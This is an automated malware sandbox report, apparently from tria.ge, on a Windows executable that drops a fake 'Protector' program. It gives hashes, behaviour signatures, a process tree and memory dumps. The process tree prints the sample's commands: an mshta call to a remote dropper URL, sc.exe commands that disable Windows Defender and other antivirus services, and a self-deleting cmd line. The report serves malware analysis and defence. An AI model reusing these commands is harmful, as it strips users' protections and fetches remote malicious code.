Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    152s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/12/2023, 23:12

General

  • Target

    1f9b619074e3ef7c19b296330e290dde.exe

  • Size

    2.0MB

  • MD5

    1f9b619074e3ef7c19b296330e290dde

  • SHA1

    8342d1aa1cef5d5d10ee68a4dfcca4de12599502

  • SHA256

    a6e0ce289db711413ba5395a80e50a0ed95c3927448492d3ecde38506227c571

  • SHA512

    3ae7ef2c3181b44816e0cb7186b113c8e99d97e06a56d7b4babf283cdc342f18273e39c66912c41bdbbabc62303bb8bb998cee9db0234847a521df46ae6784c6

  • SSDEEP

    49152:DKqoP5uG7LG6sjWmlwsg7IklBKZICcDIGXQvh9zK4tMy+iZKnkJeYuFEb:DQP5uGvC9bg7DlBqICchX8W1iZgkJLuo

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=35&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=mgrdvyopcy&14=1

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Disables taskbar notifications via registry modification
  • Sets file execution options in registry 2 TTPs 64 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1f9b619074e3ef7c19b296330e290dde.exe
    "C:\Users\Admin\AppData\Local\Temp\1f9b619074e3ef7c19b296330e290dde.exe"
    1⤵
      PID:3672
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe" -e -pm1it982889f9266
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3564
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:556
          • C:\Users\Admin\AppData\Roaming\Protector-qxsn.exe
            C:\Users\Admin\AppData\Roaming\Protector-qxsn.exe
            4⤵
            • UAC bypass
            • Sets file execution options in registry
            • Executes dropped EXE
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Modifies Internet Explorer settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:4960
            • C:\Windows\SysWOW64\mshta.exe
              mshta.exe "http://galaint.coolsecupdate.info/?0=154&1=1&2=1&3=35&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=mgrdvyopcy&14=1"
              5⤵
                PID:2068
              • C:\Windows\SysWOW64\sc.exe
                sc config AntiVirSchedulerService start= disabled
                5⤵
                • Launches sc.exe
                PID:776
              • C:\Windows\SysWOW64\sc.exe
                sc config AntiVirService start= disabled
                5⤵
                • Launches sc.exe
                PID:2640
              • C:\Windows\SysWOW64\sc.exe
                sc stop AntiVirService
                5⤵
                • Launches sc.exe
                PID:4996
              • C:\Windows\SysWOW64\sc.exe
                sc config ekrn start= disabled
                5⤵
                • Launches sc.exe
                PID:4420
              • C:\Windows\SysWOW64\sc.exe
                sc config msmpsvc start= disabled
                5⤵
                • Launches sc.exe
                PID:3576
              • C:\Windows\SysWOW64\sc.exe
                sc stop msmpsvc
                5⤵
                • Launches sc.exe
                PID:3508
              • C:\Windows\SysWOW64\sc.exe
                sc config WinDefend start= disabled
                5⤵
                • Launches sc.exe
                PID:1716
              • C:\Windows\SysWOW64\sc.exe
                sc stop WinDefend
                5⤵
                • Launches sc.exe
                PID:2592
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" res://ieframe.dll/navcancl.htm#http://myipreal.info/
                5⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3812
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3812 CREDAT:17410 /prefetch:2
                  6⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2584
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\13TU7H~1.EXE" >> NUL
              4⤵
                PID:2924

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VH9W14NQ\suggestions[1].en-US

          Filesize

          17KB

          MD5

          5a34cb996293fde2cb7a4ac89587393a

          SHA1

          3c96c993500690d1a77873cd62bc639b3a10653f

          SHA256

          c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

          SHA512

          e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe

          Filesize

          1.4MB

          MD5

          bd732cba69519d4dc6b5c2b6c4f9bf45

          SHA1

          b26d1b54450e012160c41de303b219ee826c9d43

          SHA256

          47dc8ea9f4473b08c1e2d92ad77f673eb2d3af5dcc8f6e13d2300a5e92858c95

          SHA512

          526fd478aa42669f908050d172a9f67ec7a212a6596033b789aa947833ca08b5596cd8e9234447c12cbed3e657ae34787e30bcd65ccbe8594b72ec72750dd42d

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe

          Filesize

          1.4MB

          MD5

          268d5439d8d1246296fb22ba97d3a1b8

          SHA1

          5d315983acaed9b0f3741d1d8faa3612af436158

          SHA256

          dd8234f32f3cd2acb70c6ee2b48142c7e06e33840ee73be12327b7037da0403e

          SHA512

          e74097608213eb0e2a48c6605864df05ad7f41c610d70a01d462432ee6f01f9b8aa45448bcacd9d69d972e02fb8587f5c1461b400b5d1175cf5db06c4b126047

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f193n15598i0567.exe

          Filesize

          1.1MB

          MD5

          7f03e1e86c87a513a1e026196031bbba

          SHA1

          0fe4cb1d0a441c86568bda3260441d8b27dcc589

          SHA256

          67f625b2813fb0265cccb482f2c84edcedf6351eb78286d4f3d7bf352971f2ff

          SHA512

          c3122c27d9bfaefbda5ae14195931d2292a063b4c747746f4bdcdd2399aae7ffa0e9e5dc6514e5a7730763fd35e417e46376d7d1dcf15f5305915b8223e8e5de

        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe

          Filesize

          661KB

          MD5

          2624bb7187e84f2ab148690a14c97886

          SHA1

          eb84b6e125af0c414ac923c184633e9bf16e686a

          SHA256

          86635a0068b359c33ebe9c1f9ff9c9f94d3d03f0368071ba12386901e2df9d8a

          SHA512

          4d05d6b29a71e7e8b11a57b65e25ba06e98587e595df796047822705c11932ecf1a9df5af4fcf004426af66a223dc02b44a54943edaec64a78d2c6f3268e83ec

        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\13tu7hiem9f2421.exe

          Filesize

          381KB

          MD5

          7b6b4ad71f925e7a93345d16a8e5763d

          SHA1

          c00dbc0468562636bbc3cd72b848bfbafdda311f

          SHA256

          cbff098ed0c93b3e906c4927d3d05afb2e0d5c881d3f06e20a5a3dcb19889a45

          SHA512

          16117c7e1f35b9bf4fa5743937e9689ff4d1a6f08d977b20a0470d3f5c09bb6970e7a356dc5e5c7596c7dc072988e1826f1ce02e58302c493c8ed3d86f3398f7

        • memory/556-19-0x0000000002660000-0x00000000026BA000-memory.dmp

          Filesize

          360KB

        • memory/556-18-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/556-20-0x00000000027D0000-0x00000000027D1000-memory.dmp

          Filesize

          4KB

        • memory/556-23-0x0000000002830000-0x0000000002831000-memory.dmp

          Filesize

          4KB

        • memory/556-30-0x0000000002630000-0x0000000002631000-memory.dmp

          Filesize

          4KB

        • memory/556-32-0x0000000000850000-0x0000000000851000-memory.dmp

          Filesize

          4KB

        • memory/556-50-0x0000000003890000-0x0000000003891000-memory.dmp

          Filesize

          4KB

        • memory/556-56-0x0000000003920000-0x0000000003921000-memory.dmp

          Filesize

          4KB

        • memory/556-55-0x00000000038F0000-0x00000000038F1000-memory.dmp

          Filesize

          4KB

        • memory/556-58-0x0000000003950000-0x0000000003951000-memory.dmp

          Filesize

          4KB

        • memory/556-61-0x0000000003CA0000-0x0000000003CA1000-memory.dmp

          Filesize

          4KB

        • memory/556-63-0x0000000003E10000-0x0000000003E11000-memory.dmp

          Filesize

          4KB

        • memory/556-67-0x0000000003E40000-0x0000000003E41000-memory.dmp

          Filesize

          4KB

        • memory/556-72-0x0000000004330000-0x0000000004331000-memory.dmp

          Filesize

          4KB

        • memory/556-75-0x0000000003DF0000-0x0000000003DF1000-memory.dmp

          Filesize

          4KB

        • memory/556-81-0x00000000064A0000-0x00000000064A1000-memory.dmp

          Filesize

          4KB

        • memory/556-80-0x00000000064B0000-0x00000000064B1000-memory.dmp

          Filesize

          4KB

        • memory/556-78-0x0000000004340000-0x0000000004341000-memory.dmp

          Filesize

          4KB

        • memory/556-77-0x0000000003E20000-0x0000000003E21000-memory.dmp

          Filesize

          4KB

        • memory/556-74-0x0000000003900000-0x0000000003901000-memory.dmp

          Filesize

          4KB

        • memory/556-71-0x0000000003E30000-0x0000000003E31000-memory.dmp

          Filesize

          4KB

        • memory/556-88-0x0000000006550000-0x0000000006551000-memory.dmp

          Filesize

          4KB

        • memory/556-89-0x0000000006540000-0x0000000006541000-memory.dmp

          Filesize

          4KB

        • memory/556-86-0x0000000006530000-0x0000000006531000-memory.dmp

          Filesize

          4KB

        • memory/556-87-0x0000000006520000-0x0000000006521000-memory.dmp

          Filesize

          4KB

        • memory/556-85-0x0000000006500000-0x0000000006501000-memory.dmp

          Filesize

          4KB

        • memory/556-84-0x00000000064E0000-0x00000000064E1000-memory.dmp

          Filesize

          4KB

        • memory/556-118-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/556-83-0x00000000064C0000-0x00000000064C1000-memory.dmp

          Filesize

          4KB

        • memory/556-82-0x00000000064D0000-0x00000000064D1000-memory.dmp

          Filesize

          4KB

        • memory/556-69-0x0000000003E60000-0x0000000003E61000-memory.dmp

          Filesize

          4KB

        • memory/556-64-0x0000000003E50000-0x0000000003E51000-memory.dmp

          Filesize

          4KB

        • memory/556-60-0x0000000003CB0000-0x0000000003CB1000-memory.dmp

          Filesize

          4KB

        • memory/556-59-0x0000000003940000-0x0000000003941000-memory.dmp

          Filesize

          4KB

        • memory/556-57-0x0000000003910000-0x0000000003911000-memory.dmp

          Filesize

          4KB

        • memory/556-54-0x00000000038D0000-0x00000000038D1000-memory.dmp

          Filesize

          4KB

        • memory/556-53-0x00000000038E0000-0x00000000038E1000-memory.dmp

          Filesize

          4KB

        • memory/556-52-0x00000000038B0000-0x00000000038B1000-memory.dmp

          Filesize

          4KB

        • memory/556-51-0x00000000038C0000-0x00000000038C1000-memory.dmp

          Filesize

          4KB

        • memory/556-49-0x0000000003870000-0x0000000003871000-memory.dmp

          Filesize

          4KB

        • memory/556-48-0x0000000003880000-0x0000000003881000-memory.dmp

          Filesize

          4KB

        • memory/556-46-0x0000000003860000-0x0000000003861000-memory.dmp

          Filesize

          4KB

        • memory/556-47-0x0000000003850000-0x0000000003851000-memory.dmp

          Filesize

          4KB

        • memory/556-45-0x0000000003830000-0x0000000003831000-memory.dmp

          Filesize

          4KB

        • memory/556-44-0x0000000003840000-0x0000000003841000-memory.dmp

          Filesize

          4KB

        • memory/556-43-0x00000000036D0000-0x00000000036D1000-memory.dmp

          Filesize

          4KB

        • memory/556-42-0x00000000036E0000-0x00000000036E1000-memory.dmp

          Filesize

          4KB

        • memory/556-41-0x00000000036B0000-0x00000000036B1000-memory.dmp

          Filesize

          4KB

        • memory/556-40-0x00000000036C0000-0x00000000036C1000-memory.dmp

          Filesize

          4KB

        • memory/556-39-0x0000000003690000-0x0000000003691000-memory.dmp

          Filesize

          4KB

        • memory/556-38-0x00000000036A0000-0x00000000036A1000-memory.dmp

          Filesize

          4KB

        • memory/556-37-0x0000000002A60000-0x0000000002A61000-memory.dmp

          Filesize

          4KB

        • memory/556-36-0x0000000002900000-0x0000000002901000-memory.dmp

          Filesize

          4KB

        • memory/556-35-0x00000000029B0000-0x00000000029B1000-memory.dmp

          Filesize

          4KB

        • memory/556-34-0x0000000003650000-0x0000000003651000-memory.dmp

          Filesize

          4KB

        • memory/556-33-0x00000000008F0000-0x00000000008F1000-memory.dmp

          Filesize

          4KB

        • memory/556-31-0x0000000002840000-0x0000000002841000-memory.dmp

          Filesize

          4KB

        • memory/556-29-0x0000000003680000-0x0000000003681000-memory.dmp

          Filesize

          4KB

        • memory/556-28-0x00000000038A0000-0x00000000038A1000-memory.dmp

          Filesize

          4KB

        • memory/556-27-0x0000000003630000-0x0000000003632000-memory.dmp

          Filesize

          8KB

        • memory/556-26-0x0000000003640000-0x0000000003641000-memory.dmp

          Filesize

          4KB

        • memory/556-24-0x00000000027F0000-0x00000000027F1000-memory.dmp

          Filesize

          4KB

        • memory/556-25-0x0000000002650000-0x0000000002651000-memory.dmp

          Filesize

          4KB

        • memory/556-22-0x0000000002810000-0x0000000002811000-memory.dmp

          Filesize

          4KB

        • memory/556-21-0x0000000002820000-0x0000000002821000-memory.dmp

          Filesize

          4KB

        • memory/4960-200-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-215-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-235-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-236-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-244-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-246-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-251-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-252-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-255-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-256-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-257-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-261-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-269-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB

        • memory/4960-270-0x0000000000400000-0x0000000000805000-memory.dmp

          Filesize

          4.0MB